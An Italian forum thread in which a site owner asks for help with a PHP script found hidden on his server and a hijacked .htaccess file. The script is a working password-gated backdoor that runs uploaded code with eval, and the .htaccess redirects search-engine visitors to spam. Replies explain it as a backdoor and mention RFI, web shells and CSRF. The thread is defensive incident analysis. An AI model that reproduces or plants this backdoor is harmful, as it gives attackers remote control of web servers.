• N
    User Attivo

    il sito è delmutolo.com

    0
  • N
    User Attivo

    Potete aiutarmi a capire l'intento di questo script che ho trovato occultato nelle mie cartelle?

    
<?php
    error_reporting(1);
    global $HTTP_SERVER_VARS; 
    function say($t) { 
        echo "$t\n"; 
    };
    function testdata($t) {
        say(md5("testdata_$t"));
    };
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
        if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"])){
            eval($code);
        }
        else{
            testdata('f');
        };
    }
    else{ 
        testdata('pass');
    };
    testdata('end');
    echo "</pre>";
?>

```Credo di aver capito cosa fa, ma non riesco a capire il perché lo fa.
Mi rimane oscura la comprensione del funzionamento che c'è alle spalle.

A questo va associato il file .htaccess che viene modificato così:

    RewriteEngine on

    a0b4df006e02184c60dbf503e71c87ad

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http:([a-z0-9_-]+.)(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24).
    RewriteCond %{HTTP_REFERER}?&=
    RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
    RewriteCond %{TIME_SEC} <59
    RewriteRule ^.    $ /images/ekukure/ex3/t.htm

    a995d2cc661fa72452472e9554b5520c

    RewriteRule foto-(.*).html gallery.php?dir=$1

    0
  • C
    Bannato User

    il primo codice e' una backdoor... si intravede che chiede una password per amministrarla e fare del tuo ftp cio' che vogliono....si intravede inoltre fopen(); Puo essere che il cracker richiami quella pagina,che richiede una password...se la password e' giusta,crea un file/backdoor e accede al tuo ftp...mettendo altre backdoor...

    0
  • N
    User Attivo

    Puoi provare a spiegarmi meglio quello che hai detto? Io ho provato ad usare questo script come destinatario di una post, ho inviato un file tramite un modulo, ma non sono arrivato molto oltre.

    0
  • C
    Bannato User

    Molto spesso i cracker hanno bisogno un bug di tipo Remote File Inclusion per violare un sito web vulnerabile,e quindi prendere il controllo di tutti i file presenti in esso.

    Tramite questo bug,si possono caricare nell ftp delle shell,le piu famose sono c99 e r57 ...sono degli script php che autorizzano il lancio di qualsiasi comando nel server,quindi modificare,creare,chmoddare,eliminare files.
    Quando il file di configurazione non e' criptato,si puo risalire all'intero database per un eventuale cracking delle password.
    Inoltre, tramite queste shell,si puo avere una shell sul proprio pc che permette di diventare root,qualora i demoni o il kernel fosse vulnerabile...
    cio' vuol dire che se in un server,ci sono 2mila siti web e io sono root...immagina che bel casino che potrei combinare...

    Quei file mi sono nuovi , ma lo chiamerei ".htaccess hacking" ...
    il primo script richiede una password e apre un file...non posso capire oltre...
    il secondo e' un htaccess che si basa sui referrer e quindi quando qualcuno arriva nel tuo sito viene dirottato sulle keywords che sono indicate in esso...
    Mi sta venendo un dubbio...

    Hai phpbb vecchio e completamente modificato no?
    che qualcuno abbia caricato una shell come fosse un avatar dal nome avatar.php.jpg ????
    che mi ricordo ,phpbb aveva questo tipo di bug...
    elimina tutti gli avatar e disabilita il caricamento...
    dopodiche' cancella tutti i file sospetti che sai che non sono tuoi...dopo averli controllati ovviamente...

    Fammi sapere 🙂

    0
  • N
    User Attivo

    Ho già controllato e non ho trovato file con estensione .jpg.php

    STo iniziando a diventare matto!

    La cosa che mi fa veramente inc****re è che il deface è fatto per portare accessi a siti grandi come directline ecc.. quindi dietro questo c'è probabilmente una webagency che vuol portare accessi ai suoi clienti in tutti i modi.

    0
  • C
    Bannato User

    Detto questo c'e' solo una cosa da fare....
    Prendi tutti i file PHP , zippali e mandameli via mail...cosi cerchiamo di trovare qual'e' il problema e li freghiamo 🙂

    0
  • N
    User Attivo

    mandami in pvt l'email...ma sei sicuro di volerlo fare? E' un discreto lavoro!

    0
  • wolf.otakar
    Consiglio Direttivo

    @Cryogenic said:

    ...massi' tanto la 2.0.21 ha solo un Cross site scripting in privmsg.php e un altro Cross site request forgery...roba da "nulla"...

    Cryogenic,

    non mi sembra proprio, "roba da nulla"! 🙂

    nedone,

    intanto, aggiorna phpbb! 😉

    0
  • C
    Bannato User

    Certo, non e' roba da nulla...
    ma prendendo in considerazione una persona come Nedone,che gestisce un sito di grafica e tutorial su photoshop,non mi sembra che qualcuno gli abbia dato un link contenendo qualche script per effettuare un csrf ...
    qua si parla di spammers,ne ho visti una caterva in giro di siti bucati con RFI per mettere i propri redirect...
    Se io fossi uno spammer che fa sto tipo di lavori, sinceramente vado in irc , lancio qualche shellbot e buco come un matto...

    csrf e' senz'altro pericoloso...ma per esempio uno mi sta antipatico e voglio sfregargli un sito, allora attuo un csrf ...aggiungendomi magari come amministratore con qualche pagina html che contiene il mio exploit...
    ma gli spammers non perdono tempo per questo 😉

    Sempre secondo il mio parere eh 🙂

    0
Effettua l'accesso per rispondere